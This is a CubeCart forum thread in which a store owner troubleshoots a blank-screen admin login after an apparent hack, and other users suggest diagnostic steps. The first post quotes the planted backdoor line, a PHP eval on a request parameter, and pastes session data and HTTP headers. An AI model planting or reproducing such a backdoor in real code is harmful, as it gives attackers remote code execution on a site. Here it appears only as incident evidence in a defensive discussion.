islander Posted October 19, 2021 Share Posted October 19, 2021 Last week I upgraded from v6.4.2 to v6.4.4. Everything seemed to be working fine until after the weekend. Now when I enter username/password and click to log in I get a white screen. When I use the password change form, the same thing happens--I click, it seems to submit the form just fine, but all I see is a white screen. I've tried checking the error_log but there is nothing. I've tried enabling "display_errors" in debug.class.php, but nothing. I've also checked to see if something was reconfigured on the hosted server, but no. I'm pretty sure I've been hacked, because I checked the /includes/extra folder and found an /includes/extra-BAD folder as well. Inside the /extra-BAD folder was a snippet file I didn't recognize and a public key code file and some sess_ files. The snippet file contained just one line of PHP code: eval($_REQUEST["4ikT7"]). Here's a sample sess_ file content: __client|a:5:{s:10:"ip_address";s:14:"208.115.113.85";s:9:"useragent";s:90:"Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, [email protected])";s:13:"session_start";i:1451332019;s:12:"session_last";i:1451332019;s:8:"language";s:5:"en-US";}__system|a:1:{s:5:"token";s:32:"21828537828a8497b3b39a0f63864d74";}__recaptcha|a:2:{s:5:"error";N;s:9:"confirmed";b:0;} The final "error" was in all of them. I've removed the alien files and folder from the server, of course, but I still can't login. Any ideas? I didn't see any unfamiliar files in /images so not sure if the snippet was used to redirect to other servers or if I've got hacked content someplace else. I could really use help on this one. Thanks, Nancy Link to comment Share on other sites More sharing options...
Tony Posted October 19, 2021 Share Posted October 19, 2021 @Al Brookbanks for attention When you upgraded, did you remove the 'setup' folder? Link to comment Share on other sites More sharing options...
islander Posted October 19, 2021 Author Share Posted October 19, 2021 Yes. I'm always very careful about that. I also double checked the global.inc.php file. Thanks for the suggestion, though! Link to comment Share on other sites More sharing options...
islander Posted October 19, 2021 Author Share Posted October 19, 2021 I'm following some 2016 instructions for cleaning a hacked store: Step 7 is "If you are not able to login to the admin side of your store please reset the login via the database. " The link to resetting the login yields a 404 error. I think I've done it correctly, though, to change the password, but still can't log into the admin area. Grr. Link to comment Share on other sites More sharing options...
bsmither Posted October 19, 2021 Share Posted October 19, 2021 Does the storefront work? Do you happen to have the CubeCart Security Suite module installed? If there is no error_log, then it may be the case that the web server is disagreeing with something in the .htaccess file (assuming you are using Apache web server) - that is, before PHP even starts up and gets a chance to report anything to the error_log. Link to comment Share on other sites More sharing options...
islander Posted October 19, 2021 Author Share Posted October 19, 2021 Yes, the storefront works, except customers can't change their passwords. No, I don't have it but will certainly check out the Security Suite as soon as I can get in to admin install it. Yes I'm using a hosted Apache server. I've checked some of the .htaccess files, but will do that again and more thoroughly. Thanks! Link to comment Share on other sites More sharing options...
islander Posted October 19, 2021 Author Share Posted October 19, 2021 Is it generally safe to delete files and folders that were used in previous versions but not the latest? Omitting things like user files such as images, of course. For example, I have a /phpMailer folder on the server, but the latest version doesn't have that but has /PHPMailer instead. Is it safe to delete the /phpmailer folder? I'm trying to get as close to a clean install as possible. Thanks for the help. Link to comment Share on other sites More sharing options...
bsmither Posted October 19, 2021 Share Posted October 19, 2021 You can delete the oldest folder (which should be phpMailer - note the lowercase php). Not being able to log in vs. getting a white screen after submitting the form to do so are two different things. A failed login attempt will be shown to you. A white screen means something went wrong (as opposed to being denied). Your browser will have a Developer's Tools set of functions. One is a 'Network' tab where one can see what got posted and what was returned, if anything. Aside from the content, there will be a collection of HTTP headers in the response. Importantly, there will be the "Response status" code from the web server. That code will either be, commonly: 200, 500, or 304. A status of 500 is trouble - somewhere. Link to comment Share on other sites More sharing options...
islander Posted October 19, 2021 Author Share Posted October 19, 2021 I found some php files in a subdirectory /cache/controllers that I don't see in recent versions. They had to do primarily with admin sessions. I've removed them. Thanks for the tip about the Developer's Tools. I had forgotten about that. I'll check it now. Link to comment Share on other sites More sharing options...
islander Posted October 19, 2021 Author Share Posted October 19, 2021 With Developer Tools in Chrome, I get response status 200 on both the login page and the white screen after I submit the login. Here's the headers from after the login is submitted (with username/password removed, but it was listed correctly--I also altered the admin page name, but it too was listed correctly). I don't see any obvious errors but I don't know how to interpret parts of it. Request URL: https://www.treefrogfarm.com/store/admin_xxx.php Request Method: POST Status Code: 200 Remote Address: 216.92.173.98:443 Referrer Policy: strict-origin-when-cross-origin Response Headers cache-control: pre-check=0, post-check=0, max-age=0 content-encoding: gzip content-type: text/html; charset=UTF-8 date: Tue, 19 Oct 2021 21:50:43 GMT expires: -1 pragma: no-cache server: Apache set-cookie: CCS_B0C4C3B217=bca7de24aee9eb9bf3f50f1e0d9025d6; expires=Tue, 26-Oct-2021 21:50:43 GMT; Max-Age=604800; path=/store; domain=.treefrogfarm.com; secure; HttpOnly; SameSite=None vary: Accept-Encoding x-frame-options: SAMEORIGIN x-powered-by: PHP/7.4.24 Request Headers :authority: www.treefrogfarm.com :method: POST :path: /store/admin_xxx.php :scheme: https accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 accept-encoding: gzip, deflate, br accept-language: en-US,en;q=0.9 cache-control: no-cache content-length: 176 content-type: application/x-www-form-urlencoded cookie: CCS_B0C4C3B217=5fd53b369b82009b0ed9e34c5de6ddf7; __utmc=183381347; __utmz=183381347.1630434710.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __zlcmid=165kKkjobQZfVNO; _ga=GA1.2.290882159.1630434710; PHPSESSID=f4d343e193cb3f424f941320669d06c5; __utma=183381347.290882159.1630434710.1634628236.1634671021.12 origin: https://www.treefrogfarm.com pragma: no-cache referer: https://www.treefrogfarm.com/store/admin_xxx.php sec-ch-ua: "Chromium";v="94", "Google Chrome";v="94", ";Not A Brand";v="99" sec-ch-ua-mobile: ?1 sec-ch-ua-platform: "Android" sec-fetch-dest: document sec-fetch-mode: navigate sec-fetch-site: same-origin sec-fetch-user: ?1 upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Mobile Safari/537.36 Form Dataview sourceview URL-encoded username: xxxxxxxx password: xxxxxxxxxxxxxxxx redir: https://www.treefrogfarm.com/store/admin_xxx.php?_g=login login: Log In token: d6652a13b7cdc75d9bc2e897c76e0136 Link to comment Share on other sites More sharing options...
bsmither Posted October 19, 2021 Share Posted October 19, 2021 In your .htaccess file, I think there must be this correct declaration: RewriteBase /store/ Using an external database utility, look in the database table CubeCart_code_snippet. (Perhaps you have already done this, working through the 'Have I been hacked' knowledgebase article.) Look for any snippets here that you do not recognize. The line (in Network Developer's Tools) that follows the POST entry... you say it also has a 200 Status? Does the Network screen have a panel that shows you the content that was delivered? Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.